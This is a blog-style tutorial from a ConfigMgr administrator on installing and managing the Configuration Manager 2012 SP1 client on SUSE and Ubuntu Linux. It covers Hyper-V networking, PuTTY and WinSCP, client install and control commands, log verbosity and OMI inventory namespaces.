A simple answer to the ‘Why do I care’ argument is – you own ConfigMgr and, as a ConfigMgr administrator, you have extensive experience managing Windows systems so why not extend that capability to managing UNIX and Linux systems? In the current IT environments that exist in most organizations today, being able to show additional value with existing resources can only be a good thing! One question that may be on your mind is whether you have to learn UNIX and Linux to effectively manage those systems through ConfigMgr. There will be some learning that will be required but in no way do you need to be a full UNIX or Linux administrator to effectively leverage ConfigMgr to manage these systems. After all, the management concepts are similar – the only real difference is implementing the management. Let me say at the outset that I in no way consider myself an expert – or even proficient – at UNIX and Linux administration – but I am very proficient at ConfigMgr so with the ConfigMgr client am able to make UNIX and Linux sing! As you will soon see, the ConfigMgr client on a UNIX or Linux system is little different from the ConfigMgr client on a Windows system. The biggest hurdle is getting familiar enough with the UNIX or Linux system to know how to operate effectively. I’ll try to help you with that with a few hints below.
Other reasons that you may care to manage UNIX and Linux systems is the unified view this will bring to systems in your environment. Now not only can you deliver metrics on your Windows systems but UNIX and Linux as well!
The Unix and Linux client
The UNIX and Linux client is not distributed with the ConfigMgr 2012 SP1 or even the cumulative update 2 source. The client can be downloaded from http://www.microsoft.com/en-us/download/details.aspx?id=36212. The screenshot below shows the UNIX and Linux files all downloaded into the same directory
Notice that there are separate files for some of the supported UNIX and Linux versions but not all supported platforms have their own unique installation files. Why? Good question. The answer is found in the last couple of files called the Universal installer. This Universal installer supports installing the ConfigMgr client on all supported Linux platforms – for the UNIX platforms you should continue using the unique files for each distribution. In the list of files you see for specific files for some Linux distributions – such SLES and RedHat. These files are the original release of the ConfigMgr client and not the updated one provided by the Universal client installation.
Working with UNIX and Linux
As already stated, I by no means consider myself a UNIX or Linux guru. In fact, working with UNIX and Linux was quite interesting for me. It’s quite unusual for me to sit in front of a computer and be totally lost! J If you are new to UNIX and Linux, you likely will find yourself feeling exactly that way! Let me try to help.
In my lab I run UNIX and Linux systems as Hyper-V virtual machines – and that was the first problem. When I loaded up my first Linux environment my natural tendency was to grab the mouse to try and get things configured. Alas, the mouse didn’t work. I quickly became frustrated because I couldn’t figure out how to navigate with keyboard to even get into a terminal window. Add to this that I didn’t have any network access because the Linux distribution I chose didn’t support the Hyper-V integration components! Argghhhh. Never a quitter I struck out with my trusty Bing search skills and quickly found my way. A summary of those tips below.
1. If you choose a distribution that does not have native support for the Hyper-V integration components you can add them by downloading and installing them to Linux manually. The files and instructions can be found at the links below.
http://www.microsoft.com/en-us/download/details.aspx?id=11674 (Windows 2008 R2 Hyper-V Integration Components)
http://social.technet.microsoft.com/Forums/windowsserver/en-US/0d2c5fa8-682c-4f5d-9fe7-388dd80a7e06/simplified-instructions-for-installing-the-linux-integration-components-into-hyperv-virtual (a nice write up on how to install mouse drivers into a Linux distribution)
NOTE: If you let a native UNIX or Linux person see you using a mouse they will laugh at you! J
2. If your distribution doesn’t support the native integration components for Hyper-V then likely networking won’t work. You can generally get around this by leveraging a Hyper-V legacy NIC.
3. On SUSE Linux, YaST is a fantastic utility for configuring the NIC – as you will see below. Other distributions have their own tools and the generic ones generally work as well. IfConfig is another tool useful for configuring the network – more on that one below as well. Persisting IfConfig settings requires editing the interfaces file as described in http://www.ubuntugeek.com/ubuntu-networking-configuration-using-command-line.html.
4. Putty is your friend! Just like you want to remotely manage Windows systems, you want to do the same with UNIX and Linux systems. Putty allows you to remotely connect to a UNIX or Linux system but only from a command line. Putty is available at http://www.putty.org/
5. WinSCP makes Windows admins feel at home. One of the biggest challenges I faced was figuring out how to connect my UNIX or Linux system to my Windows environment to copy and manipulate files. The instructions for setting up the client will give you some insight on how to do that but when it comes to browsing the system to view log files, understanding the client installation location and more, I found it quite handy to have a tool like WinSCP that will allow seamlessly moving files between a Windows and UNIX or Linux environment. WinSCIP is available at http://winscp.net/eng/index.php.
6. Text editor – VI – get used to it if editing on Linux console. WinSCP will help but unless running root you must use ‘sudo’ (as you will see soon) to save info in some cases – and it’s just easier to use VI. A good shortcut doc to get you started navigating vi is http://linuxservertutorials.blogspot.com/2008/11/ubuntu-command-line-text-editor.html.
The best way to understand how to use these tools to navigate UNIX or Linux is to see it in action – so let’s start from the beginning. In my lab I have two virtual machines – one running SUSE Enterprise Linux and the other running Ubuntu 12.04. The first step with these VM’s is to confirm they are up and running on the network. If you are running in a VM and if your distribution doesn’t recognize the native NIC (such as when running in a Hyper-V environment with a distribution that does not have the integration components included) then you may need to use a legacy NIC in order configure networking.
Let’s start by working through configuring network access for my SUSE Enterprise Linux client. Note that in my lab with the SUSE Enterprise Linux client I am logging on with root – which makes things a bit easier to configure but is also less secure. For the Ubuntu 12.04 system I’ll show configuration running as a non-root account.
With SUSE Enterprise Linux installed, login as root.
To configure networking (and many other things) in SUSE Linux, YaST is a fantastic tool! There is a GUI based version of YaST and a command line version of YaST. Since we are aspiring to be expert UNIX and Linux administrators, we will go with the command line version! J It’s also really easy to use in command line form, which helps. Launch YaST from the command line by typing ‘YaST’ and navigate to configure the network as shown in the next few slides. NOTE: Navigating YaST is easily done with <tab> and <shift><tab>.
Select Network Devices > Network Card
Make sure you use the Traditional method of setup – the other will seem to work but fail when committing changes if you don’t have the required components installed in your setup.
In this case I have two Network Cards – one that is the default but that doesn’t work for me in this setup since I don’t have the Hyper-V integration components – the other was added when I added the Legacy Hyper-V NIC.
To configure the NIC simply navigate to Edit on the NIC you want to configure and fill in the details for the options. The IP address and subnet mask, along with the hostname and DNS information will be most common. Once done, commit your changes and test to ensure you can ping another system on your network.
So now the network is configured in SUSE Linux using YaST. With this done most likely you don’t need to keep the VM up and running any longer – we will connect to it with a couple of extra tools shortly. Now, let’s configure the network on the Ubuntu 12.04 system.
For the Ubuntu system I will login as a non-root account.
YaST does not exist on Ubuntu so instead we will use a more traditional means of configuring the network. This approach should work on most, if not all, Linux distributions.
To get the network configured for a one time use we can use IfConfig from the command line as shown.
Interesting! Notice the permission denied messages! Remember what I mentioned about logging in with a non-root account? That’s why I don’t have permissions to make this change. I can fix this quite easily by simply adding the ‘sudo’ command at the beginning of the command line.
And that’s it – network is configured as we see by the fact the system is now able to ping other devices on the network.
OK, so your actually not quite done. As long as you leave this session up and running, all is good. If you reboot though the network config is lost. So how do you configure the system to persist your network configuration? It’s actually not that hard but will require that we leverage a text editor and also launch that test editor with administrative permissions. I’ll also use this as an opportunity to explain the config a bit more.
The configuration file we need to modify is /etc/network/interfaces. By opening this file you can view the config but won’t be able to save it unless your editor is launched using sudo. The most ubiquitious test editor on Linux is VI so we can launch VI and edit our file as follows
I’ll select to Edit anyway and we get the file. In my case the configuration has already been added. A couple of things to note here. First, there are additional options for the network config vs. what I showed in the initial example. Second, there are very likely multiple interfaces on the system. You will need to reference and config each one appropriately. The tag, such as eth0, eth2, lo, will identify the config for each specific adapter.
NOTE: I find using VI to be utterly and unnecessarily confusing but once you get accustomed to the basic editing functions, it’s actually not that bad. The key is whether you are in command or authoring mode. Though nor exhaustive, the documentation at http://linuxservertutorials.blogspot.com/2008/11/ubuntu-command-line-text-editor.html is a great help and should be enough to get you to where you can edit and save the configurations you need in this file.
Edit the file as needed – the documentation at http://www.ubuntugeek.com/ubuntu-networking-configuration-using-command-line.html
is helpful for this. After you save if you want to ensure the network adapter configuration information is persisted, reboot and then run the configuration tool to validate, as shown.
OK, NOW you are all done with network configuration. Fun, huh? If we have full network connectivity to our VM’s then at this point there should be no need to maintain an open connection to your VM’s. I have closed my two sessions and will use two other tools to remotely manage my machines – Putty and WinSCP. I find both indespensible – for different reasons. We will use Putty now and WinSCP will come into focus when we begin discussing the client install.
Much like an RDP session in the Windows world, Putty allows remote connect to the command line of Linux machines. I will launch Putty and connect to as many systems as I need. From this point forward I will just use one of my VM’s because the steps forward are identical for whatever UNIX or Linux distribution you may be using.
After I specify the connection information I get connected to the remote system, supply my credentials and I’m in – just as if I were connected to the system locally.
Finally we are at the place where we can begin the client installation. As mentioned earlier, the universal client is the one we want to install on any supported Linux distribution. It has the latest code base and applies across all supported platforms, even when a named installer also exists (shown previously).
There is excellent step-by-step documentation for installing the ConfigMgr UNIX and Linux client. The process is to create a temporary directory, mount the client files from a remote Windows share, change the install mode so installation is allowed, install the client and then cleanup/explore. We will go through these steps here as well but I’ll also use this process to introduce WinSCP.
The first thing to do is create the temporary folder to hold our client files.
With the temporary directory made, the next step in would be to mount the client files from a remote Windows share using the command line below.
mount -t cifs -o username=<User Name>,password=<password> //<Windows computer Name>/<Client File Share> /tmp/CCMClient
This works but I see this as a great opportunity to introduce WinSCP which is an explorer like utility that is perfect for moving files between Windows systems and UNIX or Linux. So let’s use WinSCP to move the client files into the temporary directory. WinSCP is available at http://www.winscp.net.
Launch WinSCP and supply your connection details and credentials.
The connection establishes and opens into an explorer like view. The view here may be different depending on the options chosen during setup.
We will copy our installation files to the /tmp/CCMClient folder using copy & paste.
So the files are now copies and we are ready to continue with the install. So this was just a simple look at WinSCP but you hopefully already see how convenient it is. You can use WinSCP to edit text files, copy the ConfigMgr log file from the UNIX or Linux system to the Windows system to view with CMTrace and more.
With the files copied we will execute the command lines that will ready the Linux system to allow the install and then to perform the client install.
The client install completes – notice the highlighted parts. So what exactly is OMI? OMI is UNIX and Linux equivalent of WMI that Windows administrators will already find familiar. Just like the Windows ConfigMgr client, the UNIX and Linux client makes use of WMI/OMI for storing information for the client and retrieving hardware inventory. We will see this shortly.
So that’s it. The client is installed. If the client is able to communicate properly we will see it show up in the ConfigMgr 2012 SP1 console under devices. Depending on configuration you may need to approve the client. Once hardware inventory completes you will be able to see that reflected in resource explorer for the client, as shown.
If you want to practice with software distribution, that is done via packages. I build a test package using the OpsMgr UNIX or Linux agent.
Just like the Windows client, all of the activity on the UNIX or Linux client can be tracked in the log file. Different from the Windows client, all of the functions of the UNIX or Linux client are combined in a single log. Also, UNIX and Linux clients default to only show ‘Warning’ log entries. This is a different experience from the Windows client and I’ve seen many questions raised on how to read the log and
Interpret meaning. The answer is simple – add more verbosity to the log and it will then read very similar to a Windows client log file.
There are four levels of logging available – error, warning (default), info and trace. Trace is the most verbose level of logging you can have. Like verbose and debug logging, trace logging on a UNIX or Linux system is listed as something that should only be used for troubleshooting. To me, the extra level of logging provided by verbose/debug and trace makes it sufficiently valuable that I leave it on all the time – so if there is a problem I hopefully won’t need to go back and enable logging and again reproduce the issue. Each person will need to decide this for themselves. The most common argument for disabling verbose/debug or trace level logging is to prevent putting extra load on the system. For any modern device the extra load imposed by additional logging will not even be noticeable and provides great value.
To change the log level we will leverage WinSCP again and open the scxcm.conf file at /opt/microsoft/configmgr/etc/
With this level of logging in place we will restart the client and then take a look at the log. The commands to restart and interact with the client to trigger a policy or hardware inventory cycle are below.
Start, Stop, Restart
/etc/init d/ccmexecd start
/etc/init d/ccmexecd stop
/etc/init d/ccmexecd restart
Trigger Client Actions
/opt/microsoft/configmgr/bin/ccmexec –rs policy
/opt/microsoft/configmgr/bin/ccmexec –rs hinv
To take a look at the log file generated in CMTrace we use WinSCP to move the log file to our Windows system and then open in CMTrace.
OK, so one last thing to discuss. I mentioned earlier that the UNIX and Linux client makes use of OMI which is a WMI equivalent for UNIX and Linux. The beauty of this is that this allows ConfigMgr administrators who are already familiar with WMI to be able to apply those skills to the UNIX and Linux client. If we take a look at the ConfigMgr client install folder with WinSCP we will see some familiar territory. Note the highlighted area. If you have spent any time in WMI on a Windows client you will recognize these as WMI namespaces. The ccm and invagt namespace are ConfigMgr specific and the CIMV2 namespace is a system namespace ConfigMgr leverages for pulling inventory.
If we look in the cimv2 namespace we see familiar classes. Not all the classes we would see on a Windows machine – not by a long stretch – but familiar ones nonetheless – and the information in these classes is what we will collect with hardware inventory and what you will see in the console.
If we open a couple of these we will see the data that resides in each. Note that not every potential entry contains a value – same as when viewing this information on a Windows client.
And one more…
And that’s it – that’s the UNIX and Linux client – definitely worth taking a look at and hopefully this helps you along the process. One last thing to mention. As already pointed out, the UNIX and Linux client come as separate downloads. They are not part of the ConfigMgr 2012 media and, accordingly, there is no inbuilt mechanism to install the UNIX or Linux client. It’s really up to you to decide how best to do so – script, manually, whatever. Wouldn’t it be cool if we could do the install very similar to the way we are able to push the client with ConfigMgr? Hmmm…well, glad you think so. One of my colleagues, Neil Peterson, has put together a blog post on using System Center Orchestrator to do just that. The blog post is available athttp://blogs.technet.com/b/neilp/archive/2012/10/17/system-center-2012-automating-configuration-manager-client-deployment-to-linux-systems.aspx. If you haven’t started looking at Orchestrator to automate your routine IT processes, you should. Orchestrator is very familiar territory for those familiar with task sequencing and something that should be in the back pocket of every ConfigMgr administrator!
What’s on your mind? Talk back to me by leaving a comment below.